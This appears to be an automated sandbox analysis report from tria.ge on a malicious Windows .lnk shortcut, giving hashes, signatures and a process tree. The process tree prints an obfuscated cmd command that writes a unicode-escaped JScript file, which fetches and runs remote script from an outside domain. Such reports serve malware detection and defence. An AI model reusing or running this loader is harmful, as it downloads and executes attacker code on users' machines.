Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
-
submitted
17/01/2024, 19:05
General
-
Target
26586807.lnk
-
Size
1KB
-
MD5
bc345cb4f475cf31bd47c9bbbeebc376
-
SHA1
53a989af0ea25a20c022db6d5cda0204dc53d0c5
-
SHA256
8051b39e71554eb5e1bb9455160957c5a5aae1e24f261052e8e871e93420adfc
-
SHA512
8e4eca9cdddd877c7db0411a3a809733660db7e8ebc877870a10b901beb97218b6bb586b5499dc14d3df831d9327fd0ab26b5f336a939997cccfc2bb6e4fc3ef
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\26586807.lnk1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" C:\Windows\system32\cmd.exe /V/D/c "S^eT URC=C:\XE9MHO\&& mD !URC!>nul 2>&1&&S^eT HAQR=!URC!^XBLOQECJ.JS&&<nul set/p RDII=var RDII='\u0062\u0071\u0031\u002b\u0044\u0062\u0071\u0031\u002b\u0045\u0062\u0071\u0031\u002b\u0022\u002f\u002f\u0037\u0067\u0062\u0074\u006e\u0061\u0072\u0061\u0069\u0075\u0031\u002e\u0073\u0069\u0063\u006f\u006f\u0070\u0071\u0072\u002e\u006f\u0072\u0067\u002f\u003f\u0031\u002f\u0022\u0029\u003b';URC='\u003a\u0068\u0022\u003b\u0045\u0062\u0071\u0031\u003d\u0022\u0054\u0074\u0022\u002b\u0022\u0050\u003a\u0022\u003b\u0047\u0065\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0043';XBLO='\u0076\u0061\u0072\u0020\u0043\u0062\u0071\u0031\u003d\u0022\u0073\u0022\u002b\u0022\u0063\u0072\u0022\u003b\u0044\u0062\u0071\u0031\u003d\u0022\u0069\u0070\u0074\u0022\u002b\u0022';HAQR=XBLO+URC+RDII;QECJ=new Function(HAQR);QECJ(); >!HAQR!|caLl !HAQR!||caLl !HAQR! "2⤵
-